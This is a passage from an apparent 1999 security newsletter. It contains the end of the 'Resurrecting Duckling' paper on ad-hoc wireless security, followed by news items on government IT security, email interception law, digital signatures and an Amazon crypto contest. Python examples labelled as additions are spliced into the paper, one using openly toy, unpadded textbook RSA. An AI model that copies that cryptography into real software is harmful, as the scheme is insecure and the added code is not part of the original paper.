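        """Imprinting by electrical contact: plaintext secret, pre-birth state only."""
        if not self.imprintable or not secret:
            return False
        self._key, self._ctr = secret, 0
        return True

    def _die(self) -> None:
        # Only the user soul perishes; the calibration soul is left alone.
        self._key, self._ctr, self.user_soul = None, 0, {}

    def disinfect(self) -> None:
        """Death following an identifiable transaction (the bowl of disinfectant)."""
        self._die()

    def calibration_station(self, offset: float) -> None:
        """Only the physical calibration station writes the calibration soul."""
        self.calibration_soul = {"offset": offset}

    def command(self, counter: int, verb: str, arg: str, tag: bytes) -> bool:
        shogun = verb == "SEPPUKU"
        key = self._shogun_key if shogun else self._key
        last = self._shogun_ctr if shogun else self._ctr
        if key is None or counter <= last:
            return False               # not imprinted, or a replayed/old command
        expected = hmac.new(key, encode(counter, verb, arg), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return False               # not from the mother (or the Shogun)
        if shogun:
            self._shogun_ctr = counter
            self._die()
        elif verb == "DIE":
            self._die()
        elif verb == "SET_ACL":        # policy download under the shared secret
            self._ctr = counter
            self.user_soul["acl"] = set(arg.split(",")) if arg else None
        else:
            return False               # no verb lets the user soul write the calibration soul
        return True

    def read_temperature(self, requester: str, raw: float):
        """Anyone may read unless the mother has downloaded an ACL."""
        acl = self.user_soul.get("acl")
        if acl is not None and requester not in acl:
            return None
        return raw + self.calibration_soul.get("offset", 0.0)

if __name__ == "__main__":
    d = Duckling(b"constructed-shogun-key")
    d.touch(b"constructed-mother-key")
    print(d.command(*seal(b"constructed-mother-key", 1, "SET_ACL", "pda-7")))
    print(d.read_temperature("pda-9", 37.0), d.read_temperature("pda-7", 37.0))
```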
      
      
      
      Integrity
      
      So far we have seen that denial of service, the goals of authentication, and the mechanisms for identifying other principals are surprisingly different in an ad-hoc network. Is there any role for the more conventional computer security mechanisms? The answer
      appears to be a qualified yes when we look at integrity. 
      
      Integrity means ensuring that the node has not been maliciously altered. The recipient wants to be sure that the measurements come from the genuine thermometer and not from a node that has been modified to send out incorrect temperature values (maybe so
      as to disrupt the operation of the recipient's nuclear power plant). 
      
      If you can't afford signatures...
      
      Prudence dictates that a patient's temperature should only be measured by a "known good" thermometer, such as one that passed a calibration inspection within the last six months. So it is natural for calibrators to issue signed dated certificates (though some care
      must be taken if some of the thermometer's prospective clients do not possess a clock). But the certificate could have been replayed by a middleman. What sort of mechanisms should be implemented to prevent this? 
      
      If the thermometer can perform digital signatures and the palmtop can check them, the solution is straightforward: the thermometer's calibration certificate can include the node's public key. Where the thermometer cannot perform public key cryptography, the
      palmtop will establish a common secret with the thermometer using the techniques of section * and, having verified its certificate, will be able to accept messages protected by a MAC keyed with the shared secret. 
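
      The palmtop-side check for the case where the thermometer cannot do public key operations, as an added example that is not part of the paper: the calibrator's signed, dated certificate is accepted only when it arrives under a MAC keyed with the ignition key and bound to a fresh nonce, so a middleman replaying the (non-secret) certificate fails. The toy textbook-RSA calibrator key, the message layout, the nonce and the 183-day limit are assumptions.

```python
import hashlib
import hmac
from datetime import date, timedelta

# Toy textbook-RSA key for the calibrator (constructed; unpadded and far too
# small for real use, it only stands in for "a signature the palmtop can check").
P, Q, E = 2**127 - 1, 2**89 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))          # calibrator's private exponent

def digest_int(data: bytes) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % N

def make_cert(calibrated_on: date) -> bytes:
    """A dated certificate carrying no device name at all."""
    return b"calibrated=" + calibrated_on.isoformat().encode()

def calibrator_sign(cert: bytes) -> int:
    return pow(digest_int(cert), D, N)

def signature_ok(cert: bytes, sig: int) -> bool:
    return pow(sig, E, N) == digest_int(cert)

def thermometer_reply(ignition_key: bytes, nonce: bytes, cert: bytes, sig: int):
    """The thermometer only needs a MAC; the signature is the calibrator's."""
    body = cert + b"|" + str(sig).encode()
    tag = hmac.new(ignition_key, nonce + body, hashlib.sha256).digest()
    return cert, sig, tag

def palmtop_accepts(ignition_key: bytes, nonce: bytes, reply, today: date,
                    max_age_days: int = 183) -> str:
    """nonce is the fixed-length (16-byte) challenge the palmtop just sent."""
    cert, sig, tag = reply
    body = cert + b"|" + str(sig).encode()
    expected = hmac.new(ignition_key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return "bad-mac"          # replayed, or sender does not hold the ignition key
    if not signature_ok(cert, sig):
        return "bad-signature"    # not issued by the calibrator
    issued = date.fromisoformat(cert.decode().split("=", 1)[1])
    if not timedelta(0) <= today - issued <= timedelta(days=max_age_days):
        return "stale"            # calibration too old (needs a clock on the palmtop)
    return "ok"
```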
      
      At this point, we depart once more from the conventional wisdom of the computer security community. The obvious objection is that, since neither certificates nor IDs are secret, a false device might be constructed which clones a genuine one; and that the only
      proper way to use a certificate is to certify a public key whose private key is known only to the device. However, this is tied up closely with the issues of tamper proofness and tamper evidentness. If our devices are not tamper-proof, then the private key can be
      read out and installed in a bogus device; but if they meet the much weaker requirement of tamper-evidentness (say with sealed enclosures), a forger will not be able to produce an intact seal on the bogus device. So we will have confidence in a certificate which
      we receive protected under an ignition key that we shared successfully with a device whose seal was intact. (This is the first example we know of a purely "bearer" certificate: it need not contain a name or even a pseudonym.) We will now discuss this in more
      detail. 
      
      Tamper resistance
      
      The doctor's reliance on the "genuine thermometer" certificate assumed that, after the thermometer was last inspected, calibrated and certified, it stayed that way. This assumption may be questioned in many applications, especially as in Piconet not all nodes are
      well guarded, highly personal accessories such as Java rings [java-ring-www] over which the owner is expected to keep close and continuous control. On the contrary, many nodes (such as broadcasting sensors) may be commodities that are scattered around
      and left to their fate. With such a model an attacker may, and sooner or later will, modify or forge a deployed node, possibly redeploying the corrupted node in an unsuspecting environment. 
      
      This can in theory be avoided by making the node tamper-proof, but it is much easier to talk about this property than to implement it in practice [tamper-resistance], especially within the cost and form factor constraints of personal consumer electronics devices.
      Under the circumstances, it is not clear how much extra assurance is given by furnishing our thermometer with the ability to do public key cryptography; such a device can have its private key read out just as a device with a certificate but without a private/public
      keypair can be forged. 
      
      In such environments it may often be more suitable to use physical tamper-evidence mechanisms (such as seals) rather than electronic mechanisms (such as tamper sensing switches that zeroise memory). In this case, one must still design the device so that
      non-intrusive attacks (such as those based on protocol failure, power analysis and glitch attacks [cheap-tamper]) are not practical; it is also necessary to take into account the time that might pass before a broken seal is noticed, and the likelihood of successful
      attacks on the sealing mechanism [johnston-seals]. 
      
      It must also be realised that the tampering may not be limited to the onboard code and keys: a very effective attack on the unattended thermometer is to simply replace its analogue sensing element with a bad one. This attack highlights that even enclosing the
      entire processor, memory and backup battery in a high-grade tamper resistant enclosure, with only a ribbon connector to interface with the outside world, would still leave us vulnerable to direct attacks on its "peripherals". Bringing the sensor itself within the
      tamper resistant enclosure may make manufacturing too expensive (the computing and communication core will no longer be a modular building block) and may even interfere with the proper working of the sensor. So the transducer may be an Achilles' heel,
      and it may not be worth spending large sums on tamper-proofing the core if the sensor cannot economically be protected. 
      
      When making decisions about what level of tamper-proofness or tamper-evidentness a system needs, it is as well to bear in mind that corrupt nodes can be used in a number of ways. Attacks might be immediate and direct, or alternatively the attacker might field
      a number of nodes which would accept software upgrades from him as well as from the authorised source. 
      
      Software upload
      
      For nodes to be useful, there has to be a way to upload software into them, if nothing else during manufacture; in many applications we will also want to do this after deployment. So we will want to prevent opponents from exploiting the upload mechanism,
      whatever it is, to infiltrate malicious code, and we will want to be able to detect whether a given node is running genuine software or not. 
      
      Neither of these goals can be met without assuming that at least some core bootstrap portion of the node escapes tampering. The validity of such an assumption will depend on the circumstances: the expected motivation and ability of the attackers, and the effort
      spent not just on protecting the node with tamper-resistance mechanisms and seals, but in inspection, audit and other system controls. 
      
      
      
      Confidentiality
      
      We find that we have little to say about confidentiality other than remarking that it is pointless to attempt to protect the secrecy of a communication without first ensuring that one is talking to the right principal. Authenticity is where the real issues are and, once
      these are solved, protecting confidentiality is simply a matter of encrypting the session using whatever key material is available. 
      
      In the event that covert or jam-resistant communications are required, then the key material can be used to initialise spread-spectrum or frequency-hopping communication. Note that, in the absence of shared key material and an accurate time source, such
      techniques are problematic during the important initial resource discovery phase in which devices try to determine which other nodes are nearby. 
      
      
      
      Conclusions
      
      We examined the main security issues that arise in an ad-hoc wireless network of mobile devices. The design space of this environment is constrained by tight bounds on power budget and CPU cycles, and by the intermittent nature of communication. This
      combination makes much of the conventional wisdom about authentication, naming and service denial irrelevant; even tamper resistance is not completely straightforward. 
      
      There are interesting new attacks, such as the sleep deprivation torture, and limitations on the acceptable primitives for cryptographic protocols. However, there are also new opportunities opened up by the model of secure transient association, which we believe
      may become increasingly important in real networking applications. 
      
      The contribution of this paper was to spell out the new problems and opportunities, and to offer a new way of thinking about the solution space: the resurrecting duckling security policy model. 
      
      
      
      Acknowledgements
      
      We thank Alan Jones for suggesting the wireless thermometer, a prototype of which had just been built in the context of Piconet, as a minimal but still meaningful practical example. 
      
      
      References
      
      [tamper-resistance]
      Ross Anderson and Markus Kuhn. Tamper resistance - a cautionary note. In Proc. 2nd USENIX Workshop on Electronic Commerce, 1996. 
      
      [cheap-tamper]
      Ross Anderson and Markus Kuhn. Low cost attacks on tamper resistant devices. In Mark Lomas et al., editor, Security Protocols, 5th International Workshop Proceedings, volume 1361 of Lecture Notes in Computer Science, pages 125-136.
      Springer-Verlag, 1997. 
      
      [irda-www]
      Infrared Data Association. http://www.irda.org/. 
      
      [piconet97]
      Frazer Bennett, David Clarke, Joseph B. Evans, Andy Hopper, Alan Jones, and David Leask. Piconet: Embedded mobile networking. IEEE Personal Communications, 4(5):8-15, October 1997. 
      
      [Biba1975]
      Kenneth J. Biba. Integrity considerations for secure computer systems. Technical Report MTR-3153, MITRE Corporation, April 1975. 
      
      [homerf-www]
      HomeRF Working Group. http://www.homerf.org/. 
      
      [bluetooth98]
      Jaap Haartsen, Mahmoud Naghshineh, Jon Inouye, Olaf J. Joeressen, and Warren Allen. Bluetooth: Visions, goals, and architecture. ACM Mobile Computing and Communications Review, 2(4):38-45, October 1998. 
      
      [firewire]
      IEEE. IEEE standard for a high performance serial bus. IEEE Standard 1394, 1995. 
      
      [johnston-seals]
      Roger G. Johnston and Anthony R.E. Garcia. Vulnerability assessment of security seals. Journal of Security Administration, 20(1):15-27, June 1997. 
      
      [Lorenz]
      Konrad Lorenz. Er redete mit dem Vieh, den Vögeln und den Fischen (King Solomon's ring). Borotha-Schoeler, Wien, 1949. 
      
      [java-ring-www]
      Sun Microsystems. http://java.sun.com/features/1998/03/rings.html. 
      
      [homerf98]
      Kevin J. Negus, John Waters, Jean Tourrilhes, Chris Romans, Jim Lansford, and Stephen Hui. HomeRF and SWAP: Wireless networking for the connected home. ACM Mobile Computing and Communications Review, 2(4):28-37, October 1998. 
      
      [bluetooth-www]
      Bluetooth SIG. http://www.bluetooth.com/. 
      
      
      http://www.cl.cam.ac.uk/~fms27/duckling/ (frank.stajano@cl.cam.ac.uk) 
      Last modified: May 20 1999 
      
      @HWA

83.0  GOV'T IT EXECS SEEK SOFTWARE ACCOUNTABILITY
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Wednesday 20th October 1999 on 11:05 pm CET
      Federal agencies, which have begun spending millions to upgrade information
      security in response to a presidential directive, say protecting computer networks will
      also mean finding ways to hold software vendors accountable for the quality of their
      products. John Gilligan, CIO of the U.S. Department of Energy, said users have to
      "focus our attention" on better defining the expectations and enforcement of
      warranties for commercial software. Vendors must "provide products that will either be
      free from certain types of vulnerabilities or reliability problems or they will have
      financial liability". Computerworld. 
      
      (Online News, 10/19/99 04:54 PM)



           Gov't IT execs seek 'software
                     accountability'
                        By Patrick Thibodeau


       ARLINGTON, Va. -- Federal agencies, which have begun
       spending millions to upgrade information security in
       response to a presidential directive, say protecting
       computer networks will also mean finding ways to hold
       software vendors accountable for the quality of their
       products. 

       John Gilligan, CIO of the U.S. Department of Energy, said
       users have to "focus our attention" on better defining the
       expectations and enforcement of warranties for commercial
       software. 

       Vendors must "provide products that will either be free from
       certain types of vulnerabilities or reliability problems or they
       will have financial liability," said Gilligan, speaking today at
       the U.S. Department of Commerce's National Information
       Systems Security Conference. 

       Federal agencies were ordered by President Clinton last
       year to do what's necessary to protect critical systems from
       information security threats. The order set off a scramble
       among agencies to develop security plans and seek money
       from Congress. 

       But some issues aren't easily addressed. U.S. agencies are
       becoming "increasingly more reliant on commercial
       off-the-shelf products" said Christopher Mellon, deputy
       assistant secretary of defense for security and information
       operations. 

       And it's difficult to tell, in some cases, where commercial
       software code "was written, what its heritage is and to even
       know what it is you are buying," he said. 

       Defense and other federal agencies are working on plans to
       improve information security through training, vulnerability
       testing and system improvements that include developing
       incident-response teams to tackle security threats.
       Agencies are also improving training for
       system-administration workers. 

       But Congress is balking on funding. The Commerce
       Department is seeking some $79 million for its
       information-security work; and the Department of Energy,
       which was plagued by an espionage scandal, asked for
       some $35 million this year, which it has not yet received. 

       Federal officials say security funding is cost effective. One
       security incident can cost as much as $500,000 to repair. 

       As with private industry, the information security threats
       posed by disgruntled employees are greater for government
       systems than attacks from outside. But an exception to that
       rule is the National Aeronautics and Space Administration.
       According to David Nelson, the deputy CIO at NASA, most
       of its system attacks and intrusions come from outside the
       agency. Nelson said he's puzzled by it. About the only thing
       that can explain it, Nelson concluded, "is NASA is a pretty
       good place to work." 
       
       @HWA

84.0   DEFAULT #7 OUT
       ~~~~~~~~~~~~~~ 
       
       From HNS http://www.net-security.org/
       
       by BHZ, Wednesday 20th October 1999 on 11:05 pm CET
       Default issue seven was released. Again you could read some
       interesting topics: 5 reasons why your Mac is safer than winte,
       Setting up a great desktop Linux, How to make safe Windows 95 
       based server, Apple Power Mac G4, Web based encrypted
       e-mail (critic and the response), More from the ACPO front, 
       Welcome to the wonderful world of cellular phreaking, Unix 
       logging and auditing tools. 
       
       Default and default webboard.             
       
       http://default.net-security.org
       http://www.net-security.org/webboard.html
       
       @HWA
       
85.0   UK POLICE GETTING THE POWER TO TAP E-MAIL?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       From HNS http://www.net-security.org/
       
       by Thejian, Wednesday 20th October 1999 on 1:45 am CET
       UK computer users who refuse to divulge their passwords to the authorities face up to
       two years in jail under increased police powers to be unveiled in next month's
       Queen's speech. Other measures drawn up by the government will make it easier for
       companies to monitor employees' phone calls and e-mails. A third part of the
       crackdown will give the police new authority to tap mobile phone calls, pager
       messages and e-mail. The Sunday Times.        
       
       http://www.sunday-times.co.uk/news/pages/sti/99/10/17/stinwenws01031.html?999
       
       October 17 1999                          BRITAIN



       Police to get power to tap e-mail 

       Michael Prescott, Political Editor


       COMPUTER users who refuse to divulge their passwords
       to the authorities face up to two years in jail under increased
       police powers to be unveiled in next month's Queen's
       speech. 
      
       Other measures drawn up by the government will make it
       easier for companies to monitor employees' phone calls and
       e-mails. A third part of the crackdown will give the police
       new authority to tap mobile phone calls, pager messages and
       e-mail. 
      
       The plans were already attracting criticism last night, with
       one Tory MP warning that the government risked creating "a
       state surveillance system like something out of Orwell's
       1984". 
      
       Government ministers will justify the measures as necessary
       to trap pornographers, drug traffickers and fraudsters who
       exploit new technology. Police officers who gain a search
       warrant from the courts can already look at computer files,
       but provisions in the forthcoming e-commerce bill will allow
       them to demand passwords used to protect sensitive data. A
       suspect who withholds them faces a jail term of up to two
       years. 
      
       "Paedophiles and drug barons tend to send material that can
       be unlocked only if you know a code often extending to
       many digits," said a senior government source last night. "The
       law has to catch up with this." 
      
       The bill will also legally oblige internet service providers
       (ISPs) to keep records showing to and from whom material
       has been sent and received. In spite of industry complaints
       about the cost, ministers want the ISPs to keep detailed
       records on all customers for days at a time. 
      
       "The provision will prove invaluable in tracking down
       paedophile rings, for example," said a source at the
       Department of Trade and Industry, which has drawn up the
       measure in co-operation with the Home Office. 
      
       Many companies monitor employees' phone calls and
       e-mails to ensure customers and clients are being dealt with
       according to required standards. This is a grey area legally,
       but the Home Office is to give firms a legal right to monitor
       their workers, so long as they warn them that this is company
       practice. 
      
       The proposed new Interception of Communication Act will
       also deal with criminals who frequently change their mobile
       phone numbers and e-mail addresses, to exploit the fact that
       warrants are issued for a particular number or address. New
       catch-all warrants will cover all of a named individual's
       communications devices and will last for three months
       instead of two. 
      
       @HWA
       
86.0  WASHINGTON DIVIDED ON NET SIGNATURES BILL
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Wednesday 20th October 1999 on 1:25 am CET
      Continuing confusion over just what version of digital signature legislation will be
      considered on the floor of the House of Representatives has caused House leadership
      to pull consideration of the bill until next week. Aides to House Majority Leader
      Richard Armey did not return telephone calls seeking comments, but a reliable
      congressional source told Newsbytes that the House Judiciary and Commerce
      Committees still need to work out some kind of compromise on their different versions
      of the bill before it goes through the Rules Committee and eventually to the House
      floor. 
      
      http://www.newsbytes.com/pubNews/99/138045.html
      
      House Won't Vote On Net Signatures Today 

     
      By Robert MacMillan, Newsbytes
      WASHINGTON, DC, U.S.A., 
      19 Oct 1999, 3:57 PM CST
 
      Continuing confusion over just what version of digital signature 
      legislation will be considered on the floor of the House of 
      Representatives has caused House leadership to pull consideration
      of the bill until next week. 
 
      Aides to House Majority Leader Richard Armey, R-Texas, did not return
      telephone calls seeking comments, but a reliable congressional source
      told Newsbytes that the House Judiciary and Commerce Committees still 
      need to work out some kind of compromise on their different versions 
      of the bill before it goes through the Rules Committee and eventually 
      to the House floor. 
 
      A source in the Commerce Committee said that the committee still is 
      optimistic about working out a version of the legislation that suits
      their interests, despite the fact that the Judiciary Committee made 
      substantial changes to their version of the bill. 
 
      It now is up to Rules Committee Chairman David Dreier, R-Calif., and 
      his colleagues either to help forge compromise legislation between the
      two committees, to choose one version of the bill to send to the floor
      for a vote, or even to send both versions for consideration. 
 
      The bill, H.R. 1714, known as the E-SIGN Act, had been scheduled for a
      quick suspension vote in the House today, but House sources confirmed 
      that the bill had been pulled this morning. 
 
      The purpose of the legislation is to provide a national framework that
      legalizes the use of digital signatures, but many Democratic members 
      were concerned that it unfairly preempts states from enforcing their 
      own laws. 
 
      Republicans on the Judiciary Committee argued that the Democratic 
      alternative wipes out the purpose for the legislation, which is to 
      develop a national legal standard to make digital signatures legally
      binding. 
 
      Reported by Newsbytes.com, http://www.newsbytes.com . 
 
      15:57 CST
      Reposted 17:34 CST 
      
      @HWA 
      
87.0  FEDS STILL HAVING TROUBLE FINDING CYBERSECURITY
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Wednesday 20th October 1999 on 1:10 am CET
      Despite mounting pressure from Congress to make tangible progress on the
      governmentwide effort to protect critical federal information systems from hackers and
      other criminals, agencies continue to struggle with funding, personnel and training
      roadblocks, officials said today. Under Presidential Decision Directive 63, signed in
      May 1998, all federal agencies are required to develop plans and take steps to protect
      their critical infrastructure. Agency CIOs, however, are having serious problems
      finding the resources to actually follow this through. Federal Computer Week. 
      
      http://www.fcw.com/pubs/fcw/1999/1018/web-pdd-10-19-99.html
      
      OCTOBER 19, 1999 . . . 14:31 EDT 


      Feds having trouble finding money, people for
      cybersecurity

      BY DIANE FRANK (dfrank@fcw.com)

      CRYSTAL CITY, Va. -- Despite mounting pressure from Congress to
      make tangible progress on the governmentwide effort to protect critical federal
      information systems from hackers and other criminals, agencies continue to
      struggle with funding, personnel and training roadblocks, officials said today.

      Under Presidential Decision Directive 63, signed in May 1998, all federal
      agencies are required to develop plans and take steps to protect their critical
      infrastructure. Agency chief information officers have been charged with
      leading the protection of information systems under PDD 63 and are receiving
      pressure from administrators, Congress and auditors to install protective
      measures as soon as possible. 

      Agency CIOs, however, said they are having trouble finding the resources to
      follow through. 

      "It requires a lot of dollars to do PDD 63," said Roger Baker, CIO at the
      Commerce Department, during a panel session at the National Information
      Systems Security conference here. Making matters worse, the Office of
      Management and Budget has told Commerce to find the money it needs for
      cybersecurity within current budgets, not from new appropriations, Baker
      said. 

      Other agencies are experiencing similar problems, including the Energy
      Department, which, despite several high-profile security breaches, recently
      lost its battle with Congress to get $35 million added to its fiscal 2000 budget
      for cybersecurity, said John Gilligan, CIO at DOE. 

      Although lack of personnel is another well-known problem, most agencies are
      finding out that the real issue is training and awareness for current employees. 

      NASA, for example, recently worked with the Defense Information Systems
      Agency to develop a new multimedia training CD-ROM that all NASA
      personnel are required to use. However, managers and system administrators
      require a different level of training, and the agency is putting together a pilot
      certification program at the John H. Glenn Research Center in Ohio.

      "System administrators are a critical point for us, and we are not yet happy
      about our training for our system administrators," said David Nelson, acting
      deputy CIO at NASA.

      Like many agencies, the Defense Department also is working with other
      agencies and with industry to find commercial products that meet the agency's
      security needs.

      "We need to work together and communicate [and] collaborate more closely
      than ever before in order to be effective," said Christopher Mellon, deputy
      assistant secretary of Defense for security and information operations. 

      One solution DOD is considering is issuing a directive that Defense agencies
      must use products validated by the National Information Assurance
      Partnership, he said. The NIAP is a joint effort by the National Security
      Agency and the National Institute of Standards and Technology to certify that
      commercial products meet security standards. 
      
      @HWA
      
88.0  CALIFORNIA TAKES DIGITAL SIGNATURES INTO USE
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Wednesday 20th October 1999 on 0:45 am CET
      Yesterday California officially authorized Verisign Inc.
      to begin issuing digital signature certificates to secure
      communications between state agencies and between the 
      state and its citizens, ushering in a new era of electronic
      services delivery. Bill Jones, California's secretary of 
      state, marked the occasion by digitally "signing" the 
      authorization certificate for the company, making it the 
      first such transaction since the state passed a law that 
      spelled out the requirements for legally
      binding digital signatures. CNN. 
      
      California inaugurates digital
      signatures 

      October 19, 1999
      Web posted at: 9:40 a.m. EDT (1340 GMT)

      by Dan Caterinicchia 
 

      (IDG) -- Yesterday California officially
      authorized Verisign Inc. to begin
      issuing digital signature certificates to
      secure communications between state
      agencies and between the state and its
      citizens, ushering in a new era of
      electronic services delivery. 

      Bill Jones, California's secretary of state, marked the 
      occasion by digitally "signing" the authorization 
      certificate for the company, making it the first such
      transaction since the state passed a law that spelled
      out the requirements for legally binding digital 
      signatures.

      "We're bringing in the private sector to help us
      to create the opportunity for the public to
      access [government] services more quickly,"
      Jones said. "Our goal is to deliver something
      that's easily accessible but doesn't add to the
      layers of government."

      Digital signatures are seen as a vital component
      of Internet-based commerce because they
      authenticate the identities of the parties involved 
      in a transaction. Verisign, based in Mountain View, 
      Calif., was the first to satisfy California's digital
      signature requirements. 

      Jones said his department is interested in
      using digital signatures to enable residents to
      cast votes over the Internet. Other agencies
      have expressed a desire to use the tool to
      secure business filings and similar
      transactions, he said.

      Stratton Sclavos, Verisign's president and
      chief executive officer, said that for all the
      Internet has done to change the commerce
      landscape domestically and abroad, so far it
      has missed the "citizen-government relationship." He
      added that digital signature certification and the 
      host of services it affects will exact a "fundamental
      change in the way citizens are going to interact with
      [state and local] government."

      Verisign is working on similar digital signature 
      projects in Oregon, New Jersey, Utah and Washington,
      Sclavos said. 
      
      @HWA
      
89.0  AMAZON'S CRYPTO CONTEST CRACKED WITHIN HOURS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      by Thejian, Wednesday 20th October 1999 on 0:05 am CET
      On Monday, Amazon launched a two-week contest asking 
      users to decipher the hidden meaning behind five lines 
      of seemingly random numbers. The prize: a package
      of crypto books and a programmable robot kit. Hours 
      after its launch, news of the contest hit the Internet
      code-cracking community in a big way. And in a few more
      hours, cryptographers were already talking about how 
      they solved the puzzle. Wired. 
      
      Code Crunchers Crack Contest by Joanna Glasner

      1:35 p.m. 19.Oct.99.PDT A cure for the common code was reportedly found by 
      a bunch of cryptographers this week. 

      On Monday, Amazon launched a two-week contest asking users to decipher the 
      hidden meaning behind five lines of seemingly random numbers. The prize: a 
      package of crypto books and a programmable robot kit. 


      The entrants: Just about anyone, really. No math degree needed, Amazon 
      pledged. Heck, the online retailer even promised to throw in a couple of 
      hints along the way to help out the less code-adept. 

      As it turned out, it wasn't necessary. 

      Hours after its launch, news of the contest hit the Internet code-cracking 
      community in a big way. And in a few more hours, cryptographers were 
      already talking about how they solved the puzzle.

      The hoopla began around 7 p.m. EDT on Monday, when Bradley Beth, a 
      computer programmer from Richardson, Texas, sent an email posting about 
      the contest to nerd-centric news and gossip site Slashdot.org. 

      Within minutes, dozens of code-crunchers set to work on the puzzle, 
      posting their theories along the way. 

      Software developer Rob Montaro pitched in with what others took as a key 
      insight: that some of the seemingly random numerals posted on Amazon's 
      site actually matched up with the numbers used to reference books, known 
      in publishing circles as ISBN numbers. 

      Once that clue hit the wires, the rest was pretty easy, said Boston 
      software engineer Seth Finkelstein. He spent a few minutes writing a PERL 
      script to analyze the code and develop a few solutions based on Montaro's 
      insight. 

      In a couple of hours, he came up with a somewhat strangely worded but 
      reasonably coherent solution that he eventually posted online. It was one 
      of several such postings. 

      Finkelstein shied away from taking credit for his feat. He said he's not 
      certain the answer is entirely correct, adding it took no great skill to 
      come up with a reasonable interpretation. 

      "It's not a serious contest," he said. "The sheer number of people who 
      cracked it show it is not useful for hiding a message. You wouldn't want 
      your financial records to be protected this way." 

      Amazon said the contest wasn't intended as a serious crypto test, but more 
      as a kind of puzzle that might appeal to its code-crunching customers. 
      Jennifer Buckendorff and Therese Littleton, the two Amazon site editors 
      who designed the contest, saw it more as "a rainy afternoon treat for 
      geeks" and a way to promote crypto-themed books. 

      The company didn't disclose how many contest entries it has received, or 
      whether any were correct. The winner will be chosen through a random 
      drawing of correct entries at the end of the month. 

      In the meantime, a few people thought the contest was being taken a bit 
      too seriously. Or, in the words of one Slashdot poster: 

      "This contest is supposed to be winnable by people who get stumped by 
      crossword puzzles in USA Today, not by some paranoid lunatic that uses 
      Ordo Novus Seclorum to read his email and encrypts his grocery list so 
      that no one will find out he's buying stinky cheese and miniature 
      vegetables." 

      @HWA
      
90.0  SANS: CYBERSECURITY RISKS REAL      
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
      
      
      by Thejian, Tuesday 19th October 1999 on 4:45 am CET
      The SANS Institute held one of its briefings last week to help IT 
      managers debunk several myths that senior managers hold about computer
      security. The briefing took participants on four virtual "field trips"
      to the sites of actual past cyberattacks to convince them the threat is
      real. Computerworld.  
      
      http://www.computerworld.com/home/news.nsf/idgnet/9910181sans
      
      (Online News, 10/18/99 04:58 PM)



         SANS: Cybersecurity risks real
                         By Ann Harrison


      BEDFORD, Mass. -- On behalf of IT managers whose
      bosses may be skeptical about security risks, the SANS
      Institute offered a briefing last week that took participants on
      four virtual "field trips" to the sites of cyberattacks. The
      Washington-based cooperative research and education
      organization, which distributes information on computer
      security issues, held the briefing at MITRE Corp. 

      The field trips were created to help IT managers debunk
      several myths that senior managers hold about computer
      security, said Alan Paller, the institute's director of research,
      who led the presentation. 

      The first scenario, at the Oroville Dam in the Central Valley
      of California, was designed to dispel the myth that computer
      crackers can't do real damage. Paller explained that in
      1992, the FBI determined that a cracker had obtained root
      or administrative access to computers that controlled every
      dam in the northern part of California. Paller pointed out that
      even "noncritical" computers are networked to systems that
      have critical functions, such as controlling dam gates. 

      The second field trip involved a 1998 incident when a
      Massachusetts teen-ager broke into the Bell Atlantic
      telephone system and disabled communication at the
      Worcester airport, preventing the airport's control tower
      from turning on runway lights for incoming flights. The
      scenario debunked the myth that crackers who do access
      systems have no malicious intent. 

      Another example took on the notion that it is rare for
      someone to have enough skill and knowledge to break in to
      a professionally managed government computer. This
      scenario brought participants into a cracker's lab and
      showed the steps he might take to break in to a system. 

      A final scenario brought attendees into a mock U.S.
      intelligence debriefing to evaluate the indications and
      warning signs after a cyberwar. The development of this
      scenario was funded by the National Security Agency and
      included power blackouts, passenger jet collisions, Alaska
      pipeline leaks and attacks on nuclear plants. The
      demonstration showed, among other things, how difficult it
      was to trace well-executed Web hacks due to Internet
      Protocol (IP) address spoofing, which can implicate innocent
      parties. 

      At the conclusion of the presentation, Paller noted that
      results of security vulnerability tests to avoid cyberattacks
      often load system administrators with more tasks than they
      can handle, jeopardizing overall system security. He noted
      that online SNAP (System and Network Assurance
      Program) classes and off-line workshops detailed at
      www.sans.org are aimed at helping system administrators
      identify critical security weaknesses, prioritize corrective
      action and provide intensive training in security skills. 

      Harold Leach Jr. of Legal Computer Solutions Inc. in
      Boston, which offers an Internet-based litigation support
      tool, said he was impressed by the presentation and
      interested in the SANS training. "It comes down to a
      question of risk, you fix the riskiest things first, but the
      problem is figuring out what the riskiest things are," Leach
      said. 
      
      @HWA
      
91.0  "INTERVIEW" WITH MISTUH CLEAN
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/
       
      by Thejian, Monday 18th October 1999 on 6:15 pm CET
      Singapore is still in the bane of the hackers. Samantha Santa
      Maria of the Straits Times asked mistuh clean, who recently 
      defaced several sites over there, some questions regarding 
      the subject. 
      
      http://www.straitstimes.asia1.com/cyb/cyb3_1017.html
      
      Unfortunately this URL has expired and gave me a 404. I was
      unable to find this 'interview' anywhere on the net. This is 
      one reason for an archival newsletter such as this, but I was
      too late in retrieving this story... sorry.
      
      @HWA    
      
92.0  Inside Happy Hacker Oct 20th
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From AntiOnline mailing list.
      
      http://www.antionline.com/
      
      
      ----------------------------------------------------------------
      The following message was sent out via the AntiOnline Network.
      Please keep in mind, that the views and opinions expressed in 
      this article are solely those of the message's author, and may 
      not necessarily be the views and opinions of AntiOnline.
      
